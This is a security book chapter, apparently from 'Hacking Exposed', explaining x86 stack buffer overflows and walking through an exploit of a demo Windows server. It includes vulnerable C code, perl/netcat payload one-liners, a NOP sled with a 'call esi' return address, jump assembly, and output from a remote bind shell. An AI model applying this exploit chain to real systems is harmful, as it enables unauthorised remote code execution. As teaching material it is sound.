Buffer Overflows

To begin, we need to go over some required and helpful tools and skills. To ease your way through this chapter you need to have at least a cursory knowledge of the following technologies and concepts:

x86 Assembler

C programming language

Application debugging concepts

In addition, a few tools are required to get the most out of this chapter and help you follow the examples later on:

SoftIce by Numega (http://www.numega.com)

Microsoft's Visual C++ (or a C++ compiler of your choice) (http://www.microsoft.com/vstudio)

Interactive Disassembler Pro by DataRescue (http://www.datarescue.com)

Netcat by Hobbit (http://packetstorm.deceptions.org/unix-exploits/network-scanners/)

Perl by ActiveState (http://www.activestate.com)

W32Dasm by URSoftware Co. (http://members.home.net/w32dasm/)

Buffer Overflow: Its Simplest Form

A buffer overflow occurs when the amount of data being written to memory is larger than the amount of memory reserved for the operation. When that occurs, the data being written actually gets written to memory beyond the reserved section. As a result, the extra data has to go somewhere; and you can bet your next paycheck that it will be going somewhere undesirable.

Consider the following code snippet:

#include <string.h>

void overflow(void)

{

  char *name="hackingexposedhackingexposedhackingexposed";

  char buff[10];

  strcpy(buff, name);  /* copies 43 bytes into a 10-byte buffer */

  return;

}

The variable buff is allocated 10 bytes (char buff[10]) to store data. The string that name points to is then copied into buff. Because that string is far larger than the buffer allocated to hold it, the data overflows into the memory that follows the buffer. Where did the extra characters go and how can we possibly use these rogue bytes to our advantage? Before we head down that path a few more fundamentals are in order.

Assembly Language in a Nutshell

Assembly language is a low-level language written to a particular architecture and central processing unit (CPU). There are numerous varieties of assembly language including the most popular: Intel 80x86, SPARC, RISC, and Digital. Assembly language allows a programmer to tell the hardware of a system to perform direct actions, such as open a serial port, overwrite memory, or draw a line on the screen. Such a complicated topic as assembly languages is beyond the scope of this book. However, we provide a brief introduction to this low-level, Matrix-like, opcode world. We discuss only what is absolutely necessary to enable you to follow the material in this chapter.

Assembly language is the computer system's native tongue. When coding in assembler you are making direct use of the processor's instructions. You can access the processor completely, without the constraints and extra code of high-level languages. Generally, programs coded in assembly are smaller, faster, and take up less memory than their high-level counterparts. And they also are prone to obscure well-concealed bugs!

General Purpose Registers

Anyone who's tried to copy a 2MB file to a 1.44MB floppy disk knows all too well what bytes are (or the lack thereof, in this case). Bytes are a convenience for people; computers really store data as bits (binary 1s and 0s). A byte is 8 bits on a standard CPU, which allows 256 distinct values (0 through 255) to be stored in one byte:

Bit	1	2	3	4	5	6	7	8
Value	128	64	32	16	8	4	2	1
Examples
3	=	0	0	0	0	0	0	1	1
129	=	1	0	0	0	0	0	0	1
255	=	1	1	1	1	1	1	1	1

Registers are places in the CPU where bits can be stored and manipulated. Generally, there are four register sizes: 8, 16, 32, and 64 bits. In the preceding examples, the size of the register in use is 8 bits.

On processors before the 80386, the general purpose registers are 16 bits in size and are named AX, BX, CX, and DX. All the general purpose registers may be used in whatever way you desire, although they also have specific uses in certain situations. Each 16-bit general purpose register is composed of a high and a low 8-bit half: AX is made up of AH and AL, BX contains BH and BL, CX contains CH and CL, and DX is made up of DH and DL.

An example of the AX register, using the number 25263 (0x62AF), is:

AH	01100010
AL	10101111

The two 8-bit halves can be operated on directly, and any modification will have an effect on the register as a whole. As computing entered the 32-bit world, the registers were extended to accommodate this increase in size; the "E" prefix (for "extended") marks the 32-bit form, as in EAX. You may of course still operate on the 16-bit or 8-bit portions alone.

EAX [AH/AL]:	The Accumulator register. EAX is primarily used for I/O, arithmetic, and calling services.
EBX [BH/BL]:	The Base register is often used as a pointer to a base address.
ECX [CH/CL]:	The Count register is used during loop and repetition operations.
EDX [DH/DL]:	The Data register is used in arithmetic and I/O operations.

The uses of the general purpose registers are by no means set in stone; it's up to you to use them as you see fit. In some operations the registers have required uses, however.

Pointer (a.k.a. Index) Registers

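Pointer and index registers were 16 bits long on pre-80386 processors (SP, BP, SI, DI, and IP) and are 32 bits long in the extended forms shown here. The index registers are used primarily by string instructions. There are three pointer registers and two index registers: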

ESP	Stack pointer	The stack pointer always points to the top of the processor's stack. More on the stack later.
EBP	Base pointer	The base pointer usually addresses variables stored inside the stack.
ESI and EDI	Source index and destination index	Both indexes are commonly referred to as string registers and typically process byte strings.
EIP	Instruction pointer	The instruction pointer specifies the next code instruction to be executed. When you control the instruction pointer, you control the process.

The Stack

The stack is a special segment of memory used for three main purposes:

To store the return addresses of functions

To store register values

To store variables

Think of a stack like a pile of plates. You can remove a plate only from the top and add a plate only to the top. Removing a plate is known as a pop and adding a plate is referred to as a push. This type of stack is known as a last in, first out (LIFO) stack. When a function is called, register values, function parameters, and variables, along with the return address, are pushed onto the stack. Because a local buffer is allocated on the stack and sits before the saved return address, writing past the bounds of the buffer can overwrite the return address, so that the function returns to any location you choose; doing so is what is meant by exploiting a buffer overflow.

Assembler Instructions

To write your own exploit code you must know a few assembly language instructions. Table 14-1 highlights those that you need to focus on before firing up the assembler.

Tracking the Rogue Bytes

Now, back to where we left off. Let's take the same code snippet discussed earlier and break down how the CPU handles the code and more important how the memory, stack, and registers look while the program is working. Repeating the previous code snippet:

#include <string.h>

void overflow(void)

{

  char *name="hackingexposedhackingexposedhackingexposed";

  char buff[10];

  strcpy(buff, name);  /* <= */

  return;

}

Table 14-1. Basic Assembly Instructions

Category	Instruction	Description
General instructions	pop destination	Pop data from the stack.
General instructions	push source	Push data onto the stack.
General instructions	mov destination, source	Move or copy a byte, word, or dword between registers or between registers and memory.
Address instructions	lea destination, source	Load effective address.
Addition instructions	add destination, source	Add bytes, words, or dwords.
Addition instructions	inc destination	Increment.
Subtraction and comparison instructions	cmp destination, source	Compare.
Subtraction and comparison instructions	dec destination	Decrement a byte, word, or dword.
Subtraction and comparison instructions	sub destination, source	Subtract.
Logic instructions	xor destination, source	Logical exclusive OR.
Logic instructions	test destination, source	Test bits.
Logic instructions	or destination, source	Logical OR.
Shift/rotate instructions	shl destination, count	Shift left.
Shift/rotate instructions	shr destination, count	Shift right.
Unconditional transfer instructions	call target	Call procedure.
Unconditional transfer instructions	jmp target	Jump unconditionally.
Unconditional transfer instructions	ret value	Return from procedure.

When the procedure "overflow" is called, the stack layout at the point marked by "<=" in the preceding overflow() function looks like this:

address of *name

address of buff

vars

buff

saved ebp

return address

When the strcpy function is called, the bytes pointed to by name are copied into our buffer buff, which is allocated on the stack. The extra bytes then overwrite the saved ebp along with the saved return address. When the overflow() function returns, esp is restored from ebp, the saved ebp value is popped, and what should be the saved return address is popped off the stack into EIP.

In normal situations, the value popped into the instruction pointer (EIP) is the address of the instruction that follows the call. Because we have overwritten the return address with our own bytes, EIP instead receives those bytes and points to whatever location they spell out. As a result, upon running the program, we are greeted with an all too familiar sight in the hacker world: the Application Error (a.k.a. the "Dr. Watson error"), as shown in Figure 14-1.

Figure 14-1. Application Error message


But let's take a closer look at those bytes. The first value, 0x70786567, is the hexadecimal value of "pxeg," which is "gexp" (as in "hackingexposed") with its bytes reversed, because x86 stores the low-order byte first. Thus the bytes our strcpy() wrote past the end of buff have ended up in EIP. And, if we can modify the value of the instruction pointer, we can seriously alter the course of the program by pointing EIP to code that we place in memory with the overflow. What if we fill the buff buffer with machine code (the binary representation of assembly language instructions) and overwrite EIP with a pointer to that code? We have the single greatest fear of almost any software company concerned with security. We would be able to execute any command on the remote target system without ever guessing a password; in other words, the world would be in our hands.

Buffer Overflow: An Example

Let's move on to an interesting example, including an explanation of how we can turn this situation to our advantage.

We have three options in our quest for buffer overflow vulnerabilities:

Source code review

Disassembly

Blind stress testing

If we want to exploit Windows, the focus of this chapter, we're limited to the last two options: disassembly and blind stress testing. Let's consider each and their inherent strengths and weaknesses.

Disassembly

Disassembly is the art of taking a binary executable program (a.k.a. software) and turning it back into assembly language, the instructions that the CPU carries out. If we're serious about reverse engineering, there is only one tool of choice: Interactive Disassembler Professional from DataRescue.

In the closed-source world of Windows, the ability to look beneath the surface is an incredibly valuable asset. To locate vulnerabilities via this method requires an understanding of how high-level functions are translated into assembly. For example, consider this common snippet of C code:

#include <stdio.h>

int vuln(char *user)

{

  char buffer[500];

  sprintf(buffer, "%s is an invalid username", user);  /* no limit on the length of user */

  return 1;

}

An argument of user-controlled length, user, is copied into the 500-byte buffer (buffer). As we control the amount of data being passed into the buffer, we can overflow its boundaries and, with any luck, execute arbitrary code.

The code looks like this in the disassembler:

mov  eax, [ebp+8]

push  eax

push  offset aSIsAnInvalidUs ; "%s is an invalid username"

lea  ecx, [ebp-1F4h]

push  ecx

call  _sprintf

First, a few essentials. Parameters are pushed onto the stack in reverse order (last argument first). Almost every instruction that references memory above EBP (e.g., [ebp+8]) is referencing a procedure parameter, whereas local variables are referenced at negative offsets from EBP (e.g., [ebp-1F4h]).

So what's going on? The parameter at [ebp+8] (our user string) is loaded into eax and then pushed onto the stack. Next the format string is pushed, followed by the address of the buffer, which lea places in ecx. Here, 0x1F4 equals 500 decimal (the 500-byte buffer). When reverse engineering, you should investigate these types of calls first. So long as you remember these few essentials, you won't have much trouble deciphering the low-level translation of functions.

Blind Stress Testing

When attacking a mail server, for instance, before diving headfirst into pages of assembly code, we often find it easier and almost as effective to just go by the book. By obtaining the SMTP RFC (request for comments) we have all the information we need with respect to the default commands expected by the server: Send long strings as parameters to the commands. It's as simple as that.

A good tool for the job is NTOMax, a free tool from Foundstone (http://www.foundstone.com).

We see from the source of ch14server.c where the offending code lies:

void crash(void){

  char buff[1400];

  strcpy(buff, rbuff);  /* rbuff holds the bytes received from the socket */

  return;

}

The data received over the socket held in the variable rbuff is passed to the 1400 byte buffer buff without any form of bounds checking. So, obviously, if we send in excess of 1400 bytes of data we'll overwrite memory that we shouldn't. Let's see if we can overwrite anything important. To begin, execute ch14server.exe:

C:\> ch14server.exe

Load up SoftIce and press Ctrl-D to enter it. If you're running in a Win9x environment, the command "faults on" should do the trick; it traps any memory violations. However, if you're running NT or Windows 2000, "faults on" alone won't do it, because SoftIce tends to have a little trouble trapping exceptions in this environment. Instead, type:

bpx kiuserexceptiondispatcher do "u *(*esp+0c)"

This command sets a breakpoint on the NT exception handler and disassembles the address pointed to by esp+0c. That address holds the location of where the exception occurred. From the command line type:

C:\> perl -e 'print "x" x 1400 . "abcd\n" '|nc yourhost 9999

Doing so sends 1400 bytes of the character "x" to TCP port 9999, followed by 4 bytes that really have no place to go except over important memory locations. Figure 14-2 was derived from the Visual C++ debugger, merely for aesthetic purposes.

Figure 14-2. EIP overwritten by "abcd"


Note in the upper left portion of the screen that the instruction pointer was overwritten by the hex sequence 0x64636261, which is the "abcd" we appended to our string, read low-order byte first (0x61 is "a" and 0x64 is "d").

Now that we have control of the processor, where do we go? We are presented with a couple of options. Option one is to jump directly into the stack, but unfortunately, because of the one-crash allowance of Windows, this isn't a particularly good option. A rough idea of the stack layout, or perhaps a large enough NOP (no operation) sled, may enable us to hit pay dirt. But, ideally, we want something foolproof. Option two is to jump to a code snippet of the process itself or to a loaded DLL that will execute our code. Let's take a look at the registers and see what we have to play with.

We quickly see that one of the few registers pointing to anything useful is ESI, which points directly into our buffer. Try it for yourself by typing "d esi" in SoftIce. Ideally what we want is a snippet of code loaded in memory that performs a "call esi" or "jmp esi." This will execute the code at the memory location pointed to by the register. The best bet is code from the executable itself, because it remains static.

We now load ch14server.exe into W32Dasm. For real reversing work, W32Dasm doesn't do the trick, but it does have its uses. It is extremely fast, so for locating an instruction sequence it is ideal. Finally, we enter "call esi" in the search box, as shown in Figure 14-3.

Figure 14-3. Search box


We find exactly what we're after at offset 0x0040336e. This time, instead of appending our "abcd" string, we append the address of the "call esi" instruction. Remember, the NULL termination takes care of the last byte: stored low-order byte first, the address is 6e 33 40 00, so we send only the first three bytes and the string terminator supplies the final 00. Instead of sending the character "x," we send NOPs and embed an int 3 in them. To catch it, we enter SoftIce and type "bpint 3" to set a breakpoint on the interrupt. We then execute this chain of commands on the system:

perl -e 'print "\x90" x 1399 . "\xCC\x6e\x33\x40"' | nc yourhost 9999

We now have sent 1399 nops, followed by the opcode "CC," which translates to int 3 and finally the replacement return address, which will perform a "call esi." If all went according to plan, the debugger should kick in as it reaches the interrupt. We now have code executing on the remote process.

Obviously in the real world, code that executes nops and an embedded interrupt is of no real worth. So let's plug in something a little more useful and see what is happening.

(A site maintained by a fellow named Izan provides a handy online tool to generate port-binding win32 shellcode. It is available at http://www.deepzone.org.)

The generator requires addresses from the executable/dll for the two functions LoadLibraryA and GetProcAddress. We can find the two offsets by searching the disassembler or by using a tool such as DUMPBIN to display the import addresses. Figure 14-4 shows the locations of the two functions.

Figure 14-4. Addresses for functions LoadLibraryA and GetProcAddress


The two needed offsets are 00406068 and 004060a8. The two functions are used in the shellcode to dynamically obtain the addresses of other functions. The generator can produce shellcode in ASM, C, perl, and Java formats. The byte sequence we must send consists of:

0x90 * (1400 - sizeof(shellcode)) <shellcode> <ret address>

When the server receives this string, the saved return address from the crash() call is overwritten by our address that points to "call esi." ESI points to our NOP sled followed by our port-binding shellcode. When the function returns, instead of returning to where it should, it returns to the location of "call esi," which then executes our code.

Unfortunately we face a minor problem. The bytes we control at ESI aren't quite enough to contain the entire deepzone shellcode. Let's once again consult the disassembly. We see that the address 0x004098fc is pushed before the call to recv(). That's the address that holds the received bytes. If we add code to our string that will jump to that address we should be home free:

xor eax, eax  ; set eax to 0

mov eax, 4098fc99h  ; move the recv address into eax followed by 99 hex

shr eax, 08  ; knock off the 99 byte

xor ecx, ecx   ; set ecx to 0

mov cl, 20h  ; set ecx to 20h

add eax, ecx  ; add to eax to skip over this code

call eax  ; call our shellcode

When this code is executed, it will locate the initial buffer, add to it slightly to skip over this code, and then execute. The reason for the somewhat nonstandard assembler code is to avoid the use of NULL bytes. To understand the exploitation action fully, we recommend that you step through the code in the debugger:

C:\exploit>Ch14client 192.168.10.2 9999

Chapter 14 buffer overflow demonstration exploit.

Connecting....

Data sent.

Telnet to 192.168.10.2 port 8008 now.

C:\exploit>

Trying 192.168.10.2....

Connected to acmelabs.net (192.168.10.2).

Escape character is '^]'.

Microsoft Windows 2000 [Version 5.00.2195]

  Copyright 1985-1999 Microsoft Corp.

C:\exploit>

The shellcode binds a full-fledged command prompt to port 8008. With a command prompt of this sort, the possibilities are endless.